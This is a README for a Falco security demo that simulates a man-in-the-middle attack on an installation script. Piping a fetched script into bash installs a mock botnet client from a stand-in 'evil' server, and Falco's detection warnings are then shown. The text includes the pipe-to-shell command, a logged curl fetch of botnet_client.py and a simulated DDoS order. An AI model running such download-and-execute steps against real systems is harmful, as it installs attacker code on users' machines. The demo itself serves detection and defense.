Files
falco/examples/mitm-sh-installer

Demo of falco with man-in-the-middle attacks on installation scripts

For context, see the corresponding blog post for this demo.

Demo architecture

Initial setup

Make sure no prior botnet_client.py processes are lying around.

Start everything using docker-compose

From this directory, run the following:

$ docker-compose -f demo.yml up

This starts the following containers:

  • apache: the legitimate web server, serving files from .../mitm-sh-installer/web_root, specifically the file install-software.sh.
  • nginx: the reverse proxy, configured with the config file .../mitm-sh-installer/nginx.conf.
  • evil_apache: the "evil" web server, serving files from .../mitm-sh-installer/evil_web_root, specifically the file botnet_client.py.
  • attacker_botnet_master: constantly trying to contact the botnet_client.py process.
  • falco: will detect the activities of botnet_client.py.

Download install-software.sh, see botnet client running

Run the following to fetch and execute the installation script, which also installs the botnet client:

$ curl http://localhost/install-software.sh | bash

You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).

Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:

$ ps auxww  | grep python
...
root   19983  0.1  0.4  33992  8832 pts/1    S    13:34   0:00 python ./botnet_client.py

$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:

attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands

At this point, kill the botnet_client.py process to clean things up.

Run installation script again using fbash, note falco warnings.

If you run the installation script again:

curl http://localhost/install-software.sh | ./fbash

In the docker-compose output, you'll see the following falco warnings:

falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)